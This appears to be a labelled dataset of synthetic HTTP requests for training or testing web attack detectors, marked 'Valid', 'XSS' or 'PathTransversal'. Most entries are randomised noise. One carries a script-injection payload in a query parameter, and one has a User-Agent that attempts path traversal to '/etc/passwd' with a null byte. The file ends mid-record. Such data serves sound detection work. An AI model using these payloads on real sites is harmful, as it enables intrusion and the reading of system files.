GET /srfTigaoet/mrnsGquThdsnh2/cPF2G9xLY/AUancss9ntP/-IlKI1VsP7iTpN/waust2peyd/FME_CmnetcatoISGf4D3/kmnm6m.JD/messaaniltsithr.shtml?owuuieiemof=8&wZjes=e%25nIsock_stream+formlivareshutdown%5Care&yofnn=nYwZIX&3oksCsEi=etmfptn&ee=a70%40NC39sgtq&Zg-U.D=0%3Ehr&3salDsme1oieg=S+Tten2cdGor HTTP/1.0
Host: 124.86.149.34
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: max-stale=417
Client-ip: 76.220.112.32
Cookie: Zq2T6HG4=orOe;SfeTtdtsnc=477371;Wt=Irt
Cookie2: $Version="25"
Date: Thu, 26 Oct 06 12:43:20 CET
ETag: "O90S3RZvs0iyNJ3TSa6"
Expect: 100-continue
From: moea@estmzx.uk
If-Modified-Since: Sat, 31 Oct 09 07:40:50 CET
If-Unmodified-Since: Thu, 29 Jul 04 12:16:24 UTC
If-Match: "doJMwggKjH@wj-Ex"
If-None-Match: *
If-Range: Mon, 02 May 05 21:09:11 CET
Max-Forwards: 5
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: Basic c29odGhOYXg6M3luc3VkZGQ=
Authorization: Basic ZXVsYTloZTE6OXJudA==
Range: 921246-43
Referer: /u1uatu.jsp
TE: gzip,trailers
Trailer: Host
User-Agent: Mozilla/9.0 (compatible; Konqueror/2.3; Windows NT; daRsunsonw; nrjciIat; Teexehnc)
UA-CPU: x86
UA-Disp: 8275,864,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 246x7710
Via: FTP/7.9 112.230.225.23, HTTP/3.6 18.199.49.98
Transfer-Encoding: gzip
Upgrade: leeo/7.8, ciiam/4.0, wtx/5.6, u8e/9.4
Warning: 503 www.hesa5ol.html:9360 "rpo78l" "Thu, 30 Jun 05 14:07:38 UTC"
X-Forwarded-For: 152.55.56.249
X-Serial-Number: 7592797493312
----: -------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 19687
Start - Id: 29484
class: Valid
GET /ljs/dyy/tanzdeatlc2dRiydAI/uT44g1Z/M54k5Vwecxp_v1w/m@Xk3_6KCFOX571lQ/n6pitzt/ykMn0/iai1t/iO.shtml?M8Id=33447132&xvtr=sNsNd%3Bctmyf&dlftmrshst=ewia&bdMGDuzf=t%26+xv&Nt2bvm=38670&1tncmearltsmp=wtmpernph-l&ti=9&ua=dyi&5hs7=092&eirutsstEho=cwclhri8c&x2s=PsexecBenoeym%297+%3Eiicat%7E&bE_oJy0-Cs=ospibe HTTP/1.1
Host: www.p8Vltitem.fr
Connection: orRzh
Accept: application/rtf, text/plain
Accept-Charset: windows-1258;q=0.3
Accept-Encoding: compress;q=0.9, gzip, gzip;q=0.9, deflate
Accept-Language: o2-ri4tx;q=0.7, rt3bi-arsL3t7;q=0.2, tpySg5i-rr4lseOt, 0a-ti6
Cache-Control: max-stale=4
Client-ip: 73.184.178.164
Cookie: ataarM='a;hpfr6dgr7r3=9541036;ndhk=pst5;oa1pRogbEoaPtz=5
Cookie2: $Version="626"
Date: Sun, 14 Nov 04 18:08:52 CET
ETag: W/"e.9-Z97x5u2_n-Bwv"
Expect: 100-continue
From: hnoyso@ioJaegaa.st
If-Modified-Since: Tue, 15 Jan 08 23:38:38 UTC
If-Unmodified-Since: Tue, 08 Dec 09 15:08:35 GMT
If-Match: *
If-None-Match: "1_0SXmsNiYLO_gaqmcKr"
If-Range: "qcL.gO8r1j-F-07_"
Max-Forwards: 6
MIME-Version: 6.9
Pragma: rnm=ot
Proxy-Authorization: Digest opaque="tidRaOc"
Authorization: Digest response="8fA8c2de0B88e6393f51A4688A09Dcd0"
Range: 6551-
Referer: /dhh5riuB/ontjeh.jsp
TE: trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/2.1 (compatible; Konqueror/3.6; Unix; iimHano)
UA-CPU: Sparc
UA-Disp: 3759,7587,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 522x597
Via: FTP/3.0 127.45.237.75, q1e/5.2 www.e02mh.js
Transfer-Encoding: gfte; ienrDb=rhia
Upgrade: nene/2.6
Warning: 397 74.229.205.213 "xet4unMadnhi1m7sg" "Sun, 08 Nov 09 23:21:56 UTC"
X-Forwarded-For: 160.172.24.250
X-Serial-Number: 801273405
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29484
Start - Id: 27007
class: Valid
GET /ehadsns1ea/atgw7o0k8/dV_OW/mVTxOrElX6-/0r@GPkxx8R/r@HiAD/-GKGJZ/erEbPLflmE3N/caneaLrd9d/hHUSt2e/d4vmoLZQXE/eistDnMMXvaQtPv1qBV.html?5eN=uueSgtaub HTTP/1.0
Host: www.lsioyaep.de:80
Connection: keep-alive
Accept: audio/*, application/*;q=0.7
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: *
Cache-Control: min-fresh=8922
Client-ip: 137.90.213.78
Cookie: ntiolc0rtogsGit=zm0J
Cookie2: $Version="7"
Date: Tue, 19 May 09 03:39:44 UTC
ETag: "OmC8YreAsHs3rjy"
Expect: 100-continue
From: eEtd@ots6nnd.gov
If-Modified-Since: Thu, 11 Nov 04 03:02:49 GMT
If-Unmodified-Since: Wed, 05 Mar 08 22:14:16 CET
If-Match: "hvC49@3deRgLls9L"
If-None-Match: *
If-Range: "tSHdHjn3k.vrF3xcj5hS"
Max-Forwards: 3
MIME-Version: 1.2
Pragma: 0rra7oac=saag
Proxy-Authorization: Basic b3RuaWFSYTpodG5vdGk=
Authorization: oilpM 5onab0t=17rd8s
Range: 3-
Referer: /aaote.php
TE: trailers,gzip;q=0.6,trailers
Trailer: Connection
User-Agent: o7ak (dLfnApsvJ)
UA-CPU: StrongARM
UA-Disp: 254,4962,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 6860x985
Via: HTTP/9.0 99.233.60.229
Transfer-Encoding: deflate
Upgrade: rt4na/4.6
Warning: 505 151.87.160.8 "aeiteFisgt1ec4" "Wed, 18 Jun 08 11:04:17 CET"
X-Forwarded-For: 169.21.140.148
X-Serial-Number: 39801
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27007
Start - Id: 31826
class: Valid
GET /vFYfpBRxcopy/Sw5i7l4IEdM/-xp_U77Q-9B0dBPR9m.mspx?CrDY.Oc-iX=ia&coh=O&snsh4mw=+7+dlocation&erngu=o0msixDeseliselectx&e9afo=myS%27eohrul%29ve+t%25e+&ZjW3htacces=491&re=a5nStfFsp2m&fgutAr2iO6asaea=hkaslcneo&tnzeiioaOcm=76789671&Ieaia=thn3mt&YLK73XlinkXqv=qpe5%25nn&srenauiwor8han=3648&ooneNnawle4tyle=ep4phavingnl0GBs%3Eanm%7Ca HTTP/1.1
Host: 188.44.32.191
Connection: keep-alive
Accept: application/x-tar;q=0.8
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: rez2gr-a5ei;q=0.6, slh7edk-otvo
Cache-Control: no-cache
Client-ip: 61.83.163.230
Cookie: nro4no3sosrtjtc=sgnshomeluxbhu;dlogwyDeQ2aRP=mCtr@;ieiazrjEdasax6=0aqcd;oewmrz5p5utAoC=ydPK7TKVBDlH
Cookie2: $Version="83"
Date: Thu, 19 Mar 09 09:20:11 CET
ETag: "ApNtIKrd6F0W@cw"
Expect: ptsnay
From: iinTn@uosdcs8h.fr
If-Modified-Since: Sun, 26 Mar 06 20:35:57 UTC
If-Unmodified-Since: Tue, 01 Apr 08 05:51:00 UTC
If-Match: "pjdFxsATnMxi2DlHQ"
If-None-Match: *
If-Range: Sun, 08 Oct 06 22:40:37 CET
Max-Forwards: 2
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: Basic UzRpbnpuOnNhcG5sNXc1
Authorization: Basic T291aWVzejp0eWQ0Zw==
Range: 79-9576,4502-8,7-
Referer: /9tyE/o8zpo/todLeTe.sh
TE: gzip;q=0.3,gzip;q=0.6
Trailer: Via
User-Agent: dmdhi1qon5 (5@DzHLu7; o3sZPR9; 2vQii.m3X)
UA-CPU: PowerPC
UA-Disp: 423,7753,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 540x2072
Via: HTTP/7.1 207.190.6.10
Transfer-Encoding: uhayw
Upgrade: uwafEE/9.8, tafaoe/7.4, oae/4.1
Warning: 777 www.ddJnowin.js:90 "ihAsi7h3etftaeabder" 
X-Forwarded-For: 50.243.79.16
X-Serial-Number: 829949224403613384
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31826
Start - Id: 14567
class: Valid
GET /i8xXaEsAcwIQFmT/qPxorThome/vhaioecmdoaad89i/fyR7zHqjiPw_H/lJv8s3dp79masKasDMI.tiff?lipa=unoN0BlasCri6&tErGhuicxEosa=iteeolmt2akllclins&gnitb=x&sinhmfnefaln3=Nrl8nnr15z&as31=eXO&tEOoleziM=1606392577&y1uoipAm=8&bmf3aIsyreto=wf3FXHw&e4p5Euow=020638&nie=269107&rheSdsh71a4hrz=ei&ln3o=bzasb9ruenwwcsi&3co6dhtagl=06&5comsnwrgad5l=5d0ntf&ieuaswroenltgi=rw1nqiHeshN5puh HTTP/1.0
Host: www.lteh9ss7b.com
Connection: close
Accept: text/xml, text/xml
Accept-Charset: x-mac-japanese;q=0.0, koi8-r, iso-8859-7;q=0.2
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: only-if-cached
Client-ip: 0.42.144.154
Cookie: egetmowngy2=n;ox=iXpEPyU;ati62i4=ou
Cookie2: $Version="54"
Date: Sat, 13 Mar 10 12:21:13 CET
ETag: "CWkanyPii@yR@Kxa-"
Expect: hrff=tp0ig;tdiytrep=dz3lb
From: loafnIt@stnehe3le.uk
If-Modified-Since: Thu, 08 Apr 10 09:18:36 UTC
If-Unmodified-Since: Sat, 07 Nov 09 13:58:42 UTC
If-Match: "olYCF@PXS9qUX1N"
If-None-Match: *
If-Range: Sat, 30 Aug 08 04:19:01 GMT
Max-Forwards: 17
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Basic MXdtOWhSMm86ZnRvZ3Vi
Range: 6-933,-891
Referer: /d8ep3elr/3aaa/aini/sorwb/uMttocEo.txt
TE: chunked;q=0.0,deflate,trailers
Trailer: If-None-Match
User-Agent: Mozilla/2.4 (Machintosh; U; PPC 4.9; 6h-ce; rv:6.1.6) Gecko/42566193
UA-CPU: 68000
UA-Disp: 962,7885,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 658x567
Via: 5.8 www.1lnae8rH.tiff
Transfer-Encoding: deflate
Upgrade: etist/2.2, Ncfur/8.8, eoitei/9.2
Warning: 479 www.tohasa.png "0ag7Uwsi" 
X-Forwarded-For: 214.165.29.201
X-Serial-Number: 703782437729534
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14567
Start - Id: 47346
class: XSS
GET /hW7uq/eL/XS.gif?lirtedAi=%3Cstyle++type%3D++++%22text%2Fjavascript++++%22+%3E%5Balert++%28%27er%27%29%3B%5D%3C%2Fstyle%3E HTTP/1.1
Host: www.opctaH.it:1045
Connection: close
Accept: video/*
Accept-Charset: windows-1250;q=0.9, iso-8859-5, us-ascii;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=9
Client-ip: 78.22.181.142
Cookie: neofs5arimtno=lsanybtsjeth;tsemimz=u5Naat]de8ehwfw[;x0F.S=sf(ni[;ijertnqARdxa=eydteNvpotr;ahlne=[wig
Cookie2: $Version="38"
Date: Mon, 11 Jul 05 12:14:11 UTC
ETag: W/"hFEpGMyZ@tmbqYv"
Expect: 100-continue
From: Ecnsai@ss9aup.gov
If-Modified-Since: Mon, 19 Jan 04 14:16:18 GMT
If-Unmodified-Since: Thu, 04 Oct 07 14:44:48 CET
If-Match: *
If-None-Match: "H.7ieAko@6GK25PU_Sca"
If-Range: Tue, 16 May 06 16:19:55 GMT
Max-Forwards: 58
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: Digest cnonce="izenb6"
Authorization: Basic cmlvYlNhZVg6bm1kbW1saQ==
Range: -066761,152-
Referer: /eenai/snvewe2/ttns/t9qei.wmn
TE: trailers,trailers,deflate
Trailer: Trailer
User-Agent: Mozilla/2.5 (compatible; Konqueror/3.2; Linux i386; nqioEcHe)
UA-CPU: MIPS
UA-Disp: 699,6656,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 575x5791
Via: oe6/8.5 54.186.219.133:73286, 7.8 32.224.78.106
Transfer-Encoding: identity
Upgrade: ni4st/4.0, 7issa/1.3
Warning: 030 32.43.121.212 "zsmp" 
X-Forwarded-For: 216.123.220.178
X-Serial-Number: 0450626600564347
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47346
Start - Id: 13267
class: Valid
GET /Kv/cokrm2qk.msf?VGacceptt7=HoamlnyFhLpn&duduhn=1565869&eb8=i90wttif5gig5&hiwxyewnhdqeadt=226&yXrN6q7uIl=w6eltn&fupfdtlnvtnt=tdI0 HTTP/1.1
Host: www.aehnfnmaea.cz:80
Connection: keep-alive
Accept: video/*;q=0.4, application/zip;q=0.9
Accept-Charset: euc-cn, iso-8859-4;q=0.2
Accept-Encoding: deflate;q=0.1
Accept-Language: nsei-Ic9asmu7, aeii-sw4t;q=0.4, ssC-1m;q=0.3, tbtq8sd-ik;q=0.5
Cache-Control: no-transform
Client-ip: 44.248.244.179
Cookie: Lm7ecg=emon@;hlehEe6er=Do$:
Cookie2: $Version="8"
Date: Fri, 03 Feb 06 20:54:06 GMT
ETag: W/"IHhobgIcKInx@1uGfC"
Expect: oxIda=eu5R9Na;ypalmfe
From: Geng@tdt1lr9s.biz
If-Modified-Since: Wed, 17 Dec 08 04:54:41 GMT
If-Unmodified-Since: Sun, 17 Oct 04 23:24:41 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 05 Jan 05 10:40:15 GMT
Max-Forwards: 4
MIME-Version: 0.5
Pragma: nHvn='ibsnf3ne'
Proxy-Authorization: Basic eXdTM3RkdGI6d3hyZg==
Authorization: Basic dHJrc2ltbG86dnZPeTV0emE=
Range: 219-
Referer: /aoheiat/xThesyf.mp3
TE: trailers,deflate;q=0.9,gzip;q=0.1
Trailer: Date
User-Agent: tmbsbwi8h
UA-CPU: MIPS
UA-Disp: 3770,9157,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 2344x540
Via: 5.0 62.191.61.95:59
Transfer-Encoding: rdveoa; ss1oa=gsea
Upgrade: eoeerl/8.0, Wmbit/9.9
Warning: 764 www.Zhr1sd.htm "u9u0" 
X-Forwarded-For: 137.114.108.160
X-Serial-Number: 9425321413781535
----: ---------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 13267
Start - Id: 9618
class: Valid
GET /e1otegNe/aIZ.HWnXrpSzO/whmntb/lamtycagt/yh/wNS7-6OAXQ@shEei/o864edi/W5dLOf1tMB.v/evl/isn79/xkmJNBQ.jsp?snwatsotiNtuum=rahe%3Ct&PKWposition9AF0T-6=151&ltRat=330&a1avnrseaioE=tB_DBljGx&nmSatlnfoood7B=tinoms0cltsilt&edutoNalhtthsET=script%2Fin1Zd%2B7cstsos&ad=otg-+&ttdyay=pvq+7rc%3Ba%3Bg&eZniutetgrso=ectssdi&meikrnO=ljx2wZZFm&RetmphMv=Oltso%27o+j&oteiiNon=pen%247Pg%25%7Etiorstdin%27f&acceujisch=92674636&edohe=el7Tserhbtpnnu&asuo93rb=7675 HTTP/1.0
Host: www.Tyno.gov
Connection: close
Accept: application/*;q=0.4, text/plain;q=0.0
Accept-Charset: x-mac-cyrillic, hz-gb-2312;q=0.0, x-mac-chinesesimp, cp-932, gb2312
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 111.185.54.181
Cookie: 6aaoyu1jljA=-tbonsamebz\;otAinte=p2ylGQV8VZ;oyeEhegteftknss=e6InRxLT;replaceNaSmaillw0T=13;edCmi=tesle;2sdZxM-_=andi|
Cookie2: $Version="87"
Date: Sat, 12 Apr 08 09:34:19 CET
ETag: W/"K4@O.cegRPvtQa-Yp"
Expect: 100-continue
From: yiJqeaa@9hauhsGph.fr
If-Modified-Since: Thu, 24 Jan 08 05:09:21 GMT
If-Unmodified-Since: Sat, 20 Mar 04 09:26:08 CET
If-Match: "EDCTHXF5H9aLswjr"
If-None-Match: "MSRxGVzn738hJ0gwQL3E"
If-Range: Thu, 20 Apr 06 14:34:33 CET
Max-Forwards: 238
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: NTLM cHd6c0Nycm90dHVoZWxsaGVobmZ0U3RlN2R4cDF6cmRkZXNrZ29zdDg=
Authorization: Digest nc=A0E8816f
Range: -72733
Referer: /9iqrdt/eot8i/ecae1c.asp
TE: trailers
Trailer: Cache-Control
User-Agent: Mozilla/3.8 (Machintosh; U; PPC 7.2; oA-zn; rv:0.2.5) Gecko/03266911
UA-CPU: Sparc
UA-Disp: 8659,744,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 7520x0183
Via: ihp/7.3 www.TrHu.js, HTTP/8.8 www.iadd.htm:31
Transfer-Encoding: compress
Upgrade: bcr1b/9.3, ol1eo/8.4, etne/3.1, Bs3rt9/5.7, aio/1.0
Warning: 004 www.qaG5rro.jpeg "9mp7el34osnrooE0a" "Sat, 23 Aug 08 06:38:14 CET"
X-Forwarded-For: 34.115.88.196
X-Serial-Number: 0359869
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9618
Start - Id: 23832
class: Valid
GET /xHQDRf3qahRdtK/te.css?epoadt4a=fpasswdqor3%3Fr&etafherW=400&passwdgFLrmtHJL=zHahm&JC9Tvk=%28sdn&pgdowvidoc=ao7&siehiaoa8rivrht=aq5B1Xp&sde1tneatoho=tdropisibqI%2B5ande&rCxeaetEuu4al=%28rl&omdeevisl=%7Cn%24httpwtd+s%2FpassthruO%3Do&exetoUfc6aP=aEh7SairFrg9 HTTP/1.1
Host: www.dkbrcegte.gov
Connection: close
Accept: audio/*;q=0.1, application/*, video/*;q=0.2
Accept-Charset: gb2312;q=0.9, ks_c_5601-1987, us-ascii;q=0.8, iso-8859-6, windows-1253
Accept-Encoding: *;q=0.3
Accept-Language: 6-a0nqw;q=0.6, ksJ-h;q=0.6, jkdhhoD-oHian, hq-seemieE
Cache-Control: min-fresh=53223
Client-ip: 15.149.135.18
Cookie: go0i8olSd= x
Cookie2: $Version="65"
Date: Sat, 19 Sep 09 15:45:26 GMT
ETag: W/"L3jINxLdWgkcSg_n"
Expect: eItfioDt
From: dhmtihz@kNxat8.be
If-Modified-Since: Wed, 05 Sep 07 23:28:52 GMT
If-Unmodified-Since: Wed, 02 Mar 05 11:00:53 CET
If-Match: "QzPc_N1N59GwITqdGVh."
If-None-Match: *
If-Range: "I.W5tdsKVGSujAQ0N"
Max-Forwards: 44
MIME-Version: 8.6
Pragma: yrh76iao=t
Proxy-Authorization: NTLM ckRTdG5mZXJvVXNvc2VvZ0cydGV4TG95MXJ4cmYyb2Zib25jaWNrZWV5YXJpMA==
Authorization: Digest cnonce="w4n7b"
Range: 484-,58283-,553-
Referer: /rdmqNt/a9tn/prrg.zip
TE: deflate;q=0.6,trailers,deflate;q=0.7
Trailer: From
User-Agent: embS8M http://www.et3pt.uk
UA-CPU: PowerPC
UA-Disp: 9572,573,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 646x2979
Via: 2.5 www.sOatu.html
Transfer-Encoding: deflate
Upgrade: nay/4.9, hiEdJm/5.4
Warning: 295 www.crcst0oT.png "dusoeoAdhnzaeht4at" "Mon, 07 Sep 09 24:26:21 UTC"
X-Forwarded-For: 223.106.91.27
X-Serial-Number: 31488668121661585164
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23832
Start - Id: 3072
class: Valid
GET /dsnhc/rtbL/Ae/heNWmEtJ.js?nfeK1aokstth=%3En&hse=evXnJkNOukJ HTTP/1.1
Host: 67.136.127.118
Connection: close
Accept: */*
Accept-Charset: cp-936;q=0.2, x-mac-chinesetrad;q=0.6, windows-1251;q=0.3, windows-1250;q=0.7
Accept-Encoding: gzip;q=0.2, gzip;q=0.5
Accept-Language: etld8Tte-iler6so
Cache-Control: only-if-cached
Client-ip: 203.1.184.86
Cookie: 9replaceexec5_5connectqtz=it4Vkl
Cookie2: $Version="27"
Date: Sun, 06 Aug 06 18:01:56 UTC
ETag: "mpq8MPbSS4MTt2_jKVo"
Expect: az4ds
From: ssmefI@deee3y.biz
If-Modified-Since: Tue, 18 Aug 09 19:50:37 GMT
If-Unmodified-Since: Tue, 30 Jan 07 07:15:21 CET
If-Match: "stMSF_zQF.S0xMfqEr"
If-None-Match: "MZeFeXh.hy.44IT_v"
If-Range: "HfmH47NKUGeofJPU"
Max-Forwards: 8151
MIME-Version: 8.9
Pragma: mnt4e=erun
Proxy-Authorization: inwn hvne4tt=Gseae
Authorization: 6zta 0tisnra=na7ee
Range: -3953,-5
Referer: /zoud48h/i8np/0blroc.jpeg
TE: gzip;q=0.4,chunked;q=0.0
Trailer: Trailer
User-Agent: Mozilla/2.4 (Windows; U; Windows NT 6.6; Sx-Ah; rv:6.6.1) Gecko/73262590
UA-CPU: Sparc
UA-Disp: 6710,9525,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 9081x8193
Via: inie6/7.4 www.437e.tiff, 0.2 126.30.117.44
Transfer-Encoding: gzip
Upgrade: TyHs9i/8.3, tlee/0.2, 3Drt/8.0, nnuEe3/5.2
Warning: 569 www.oeereniu.htm:0303 "atsetrg" "Wed, 17 May 06 18:16:08 CET"
X-Forwarded-For: 54.60.0.87
X-Serial-Number: 1257275939567339049
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3072
Start - Id: 46442
class: PathTransversal
POST /adfXfRo@K/n.-1/26wnPzwHDqaxHWxCP9Ep/syX8K5B0/oAyzF.UoR-ps/lr0eabwiraodkp/YKEokJ9yRautoexecm/anwateMstdeEtlq/t31KSX1zwei1j/Up2Ha/wLlGEvssGHUxY7Mg.swf? HTTP/1.1
Content-Length: 105
Content-Language: rsyte
Content-Encoding: gzip
Content-Location: /wcStetae/eaaRx/estH/eusltqr.dll
Content-MD5: ZWdlZWd6aW5jaXVoZW9FcA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 19 May 04 20:18:25 UTC
Last-Modified: Mon, 22 Oct 07 10:51:06 GMT
Host: www.pbkl0j.it:81
Connection: keep-alive
Accept: video/*, image/gif
Accept-Charset: iso-8859-9;q=0.7, iso-8859-6
Accept-Encoding: *;q=0.6
Accept-Language: *;q=0.2
Cache-Control: max-stale=88
Client-ip: 149.248.246.152
Cookie: feJ_Y@=63;R4mEf=bda;body1p0shutdown5s=rmn 3pw;FuVNUajc=rQAL3ERw_
Cookie2: $Version="59"
Date: Fri, 03 Mar 06 15:04:15 CET
Expect: te9bzU=vamasrr;Ndrl2s=amtw1ee
If-Modified-Since: Fri, 26 Nov 04 05:22:24 UTC
If-Unmodified-Since: Fri, 25 Apr 08 12:33:26 UTC
If-Match: "mr0@yFj@yTxee.yu"
If-None-Match: "tMEJkVSg2OrljzrS9s"
If-Range: Thu, 29 Dec 05 02:43:59 UTC
Max-Forwards: 279
MIME-Version: 5.1
Proxy-Authorization: NTLM ZWkyemh1bHB6d2kwZnJhY3NldHdvYXNlZDdpaEFlc2FpcjRwVG9Bb3RnbmVvZmU=
Authorization: edst ntDr0=tnuswr
Referer: /50lyejoa/Fihobns.txt
TE: gzip;q=0.5,trailers
Trailer: Accept-Encoding
User-Agent: \.\.\/\.\.\/\.\.\/\.\.\/etc\/passwd%00.html
UA-CPU: MIPS
UA-Color: color32
Via: 8.6 67.217.108.123:2354, 4iss/5.7 88.207.194.95
Transfer-Encoding: tgrhi
----: ----------------------------------------

ShayaStr=0w7noO&OaPv=9nodbslceigapa&scrpLewrtennel=3djfimwS2eoorftaa&aoo3fuk=a&o9ei=tlw8me&5rrtxkyit=0190

End - Id: 46442
Start - Id: 22642
class: Valid
GET /e_6IoeqdsaX_QqLd8d/m-Y/erhdeShaMi.shtml?snn2ousall7pM=fa&a8tn=99615&oer4h8vbn=rdAMEp HTTP/1.1
Host: 146.131.101.112:0193
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: Dhi-nvtnlw;q=0.6, e-ebyNjC;q=0.0, 1ilsPfw-7E, n-nxacrt;q=0.8
Cache-Control: no-transform
Client-ip: 68.152.34.49
Cookie: ogyl7remneovm=e;itril~;FiT-ClCDLhbm=092075;K8lod3=ehEabetweennS$@fjdivtelnet;qf7=33074;mea=w=e;inj=elnioobb4nbpg5o
Cookie2: $Version="25"
Date: Fri, 01 Sep 06 20:58:38 UTC
ETag: "n_CmCTs3OM-M4PEKOAK"
Expect: ytaye=otsrnv
From: dsezsSj@hnssHk.cz
If-Modified-Since: Mon, 22 May 06 11:50:09 CET
If-Unmodified-Since: Thu, 21 Sep 06 09:47:19 UTC
If-Match: *
If-None-Match: "Fdluxpsw6lru_lycd"
If-Range: Tue, 14 Mar 06 10:01:10 GMT
Max-Forwards: 5684
MIME-Version: 7.0
Pragma: zul=sZe
Proxy-Authorization: Digest opaque="3Fcmat"
Authorization: Basic ZmwxZW5nbWY6dGVkdQ==
Range: 08014-237833
Referer: http://eo5hw8Lr.st/leofe/n8en5wa/bntjD/emgaf1ss/Sftz.asp
TE: gzip;q=0.2,deflate
Trailer: From
User-Agent: Mozilla/5.0 (compatible; Konqueror/4.3; Unix; sbtmcpv; 2x1e; eath)
UA-CPU: Sparc
UA-Disp: 1998,0662,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 353x5479
Via: 3.4 www.job2.shtml, HTTP/0.1 www.ooltx.png
Transfer-Encoding: deflate
Upgrade: bdtoka/5.6, oh6n/9.8, oq9ry/4.2, eic/9.3
Warning: 577 www.bnimg.jpeg:110 "ifttahve" "Fri, 14 Jul 06 14:00:28 UTC"
X-Forwarded-For: 23.196.24.89
X-Serial-Number: 732034
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22642
Start - Id: 18136
class: Valid
GET /tethseJyaaesstant/trnc0hnvatmOoz1h7Iaa/5n2daaEit1e9ofxyyfe/aUT7iA.3sRe/7eNotlrheas4rjmeln/tXeLm/F_BW0lBJ7lpfU/n5W.jpg? HTTP/1.1
Host: 235.251.254.121:80
Connection: rttR
Accept: text/xml;q=0.4
Accept-Charset: cp-936, cp-932;q=0.5, iso-8859-15, x-mac-chinesesimp;q=0.0, x-mac-chinesesimp
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 165.189.39.9
Cookie: iiaa6lnxz=uptA;qh4ras=aufCteARlju l
Cookie2: $Version="59"
Date: Mon, 31 Dec 07 19:33:56 GMT
ETag: "U3bc0i@lh44zJzCiBrB"
Expect: Utfnw=cn4c;cent
From: hwDyshr1@ecneonN.be
If-Modified-Since: Sat, 06 Nov 04 21:05:55 CET
If-Unmodified-Since: Sat, 14 Oct 06 06:53:11 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 990
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: Basic NWFvOGdmOmd0Y3Fh
Authorization: NTLM YW5maGVpaXNoZXVzOG1lZTRmY2d5c2FFbjJlMHNJYXQ=
Range: -69064,75-37,650952-
Referer: http://nAsj565.fr/zohfR/ssflfxh.php3
TE: trailers,deflate,trailers
Trailer: From
User-Agent: ittEooahn1Wsrotayn
UA-CPU: Sparc
UA-Disp: 2247,5505,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 4181x6520
Via: FTP/3.3 211.251.1.239
Transfer-Encoding: identity
Upgrade: EqxgAe/7.5, mwiE09/4.9
Warning: 683 133.85.16.41:57048 "aEtal" 
X-Forwarded-For: 7.193.95.179
X-Serial-Number: 1346514779
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18136
Start - Id: 9479
class: Valid
GET /kbodyZNQ/tvk7xal.QqWMC2/ol0Uaf/wEtgoitts9e4fo.php3?9hqpeehn=lthaid8mwaxt1n HTTP/1.1
Host: www.eseru.ch:8
Connection: keep-alive
Accept: image/gif;q=0.1
Accept-Charset: *
Accept-Encoding: *;q=0.8
Accept-Language: *;q=0.9
Cache-Control: min-fresh=05124
Client-ip: 109.204.149.75
Cookie: hthghlykW4shsh=uenoFw7stake;sedzsber=b6replace1/;en74p=tri)f;eodhwliroSernan=92
Cookie2: $Version="9"
Date: Thu, 01 Apr 04 19:39:40 UTC
ETag: W/"OV8lIQPxR4a1ovUasGG"
Expect: 100-continue
From: eo4la2@wre9irnxdA.be
If-Modified-Since: Mon, 12 Jan 04 06:49:19 CET
If-Unmodified-Since: Wed, 14 Apr 10 07:34:53 GMT
If-Match: *
If-None-Match: "@XwX4AbOKkbcetMD"
If-Range: *
Max-Forwards: 0817
MIME-Version: 4.0
Pragma: d='yneec'
Proxy-Authorization: Ytur ieceeric=xuqi
Authorization: NTLM T29FZXZ1aWU1aXM3aHBwYzdZZWVlbHlqaUU5RW9kY21ob24=
Range: -6,7-441
